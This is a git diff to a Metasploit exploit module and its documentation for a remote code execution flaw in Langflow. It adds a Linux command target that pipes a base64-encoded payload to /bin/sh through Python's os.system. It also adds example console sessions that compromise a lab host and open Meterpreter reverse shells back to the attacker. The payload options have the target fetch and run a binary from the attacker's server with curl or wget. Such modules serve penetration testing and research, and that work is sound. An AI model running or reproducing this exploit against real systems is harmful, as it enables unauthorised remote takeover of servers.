diff --git a/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md b/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md index 4d97aa50e4..ea0555e0db 100644 --- a/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md +++ b/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md @@ -78,9 +78,11 @@ Valid ollama model name. ## Scenarios + +### cmd/linux/http/x64/meterpreter_reverse_tcp ``` msf > use exploit/multi/http/langflow_rce_cve_2026_27966 -[*] Using configured payload python/meterpreter/reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp msf exploit(multi/http/langflow_rce_cve_2026_27966) > options Module options (exploit/multi/http/langflow_rce_cve_2026_27966): @@ -97,39 +99,85 @@ Module options (exploit/multi/http/langflow_rce_cve_2026_27966): VHOST no HTTP server virtual host -Payload options (python/meterpreter/reverse_tcp): +Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): - Name Current Setting Required Description - ---- --------------- -------- ----------- - LHOST yes The listen address (an interface may be specified) - LPORT 4444 yes The listen port + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) + FETCH_DELETE true yes Attempt to delete the binary after execution + FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac + cepted: none, python3.8+, shell-search, shell) + FETCH_SRVHOST no Local IP to use for serving payload + FETCH_SRVPORT 8080 yes Local port to use for serving payload + FETCH_URIPATH no Local URI to use for serving payload + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + + When FETCH_COMMAND is one of CURL,GET,WGET: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + + When FETCH_FILELESS is none: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_FILENAME yVhDYYwMmZm no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces Exploit target: Id Name -- ---- - 0 Python payload + 0 Linux Command View the full module info with the info, or info -d command. -msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey= model=llama3.1:latest +msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey= model=llama3.1:latest payl +oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable. -[*] Project: b7717dc4-4cd2-4292-8c26-6ffe8b875aad -[*] Flow: d712a8b3-8a15-416b-8887-b8792242dc99 -[*] Job: c432a0d8-3667-4f94-b3a2-42cc9e000e15 +[*] Project: 367f399f-6f17-43a2-bea0-33183baae731 +[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087 +[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9 [*] Waiting... -[*] Sending stage (23404 bytes) to 192.168.56.16 -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:33598) at 2026-04-08 21:48:58 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900 meterpreter > getuid Server username: user meterpreter > sysinfo -Computer : ce88a7f7aecb +Computer : d513d5e46402 +OS : Debian 13.3 (Linux 6.8.0-56-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` + +### python/meterpreter/reverse_tcp +``` +msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey= model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable. +[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401 +[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b +[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8 +[*] Waiting... +[*] Sending stage (23404 bytes) to 192.168.56.16 +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900 + +meterpreter > getuid +Server username: user +meterpreter > sysinfo +Computer : d513d5e46402 OS : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025 Architecture : x64 System Language : C diff --git a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb index d598c97b4d..6bd9bfb99c 100644 --- a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb +++ b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb @@ -29,6 +29,14 @@ class MetasploitModule < Msf::Exploit::Remote ['GHSA', '3645-fxcv-hqr4'], ], 'Targets' => [ + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' + } + } + ], [ 'Python payload', { @@ -133,7 +141,13 @@ class MetasploitModule < Msf::Exploit::Remote exploit_data = exploit_data.gsub('__MODELNAME__', datastore['MODEL']) exploit_data = exploit_data.gsub('__OLLAMAAPIURI__', datastore['OLLAMAAPIURI']) exploit_data = exploit_data.gsub('__FILEPATH__', path) - exploit_data = exploit_data.gsub('__PAYLOAD__', payload.encode) + case target['Arch'] + when ARCH_PYTHON + payload_data = payload.encode + else + payload_data = "__import__('os').system('echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|/bin/sh')" + end + exploit_data = exploit_data.gsub('__PAYLOAD__', payload_data) exploit_data = exploit_data.gsub('__NAME__', rand_text_alphanumeric(8)) # construct POST data data = Rex::MIME::Message.new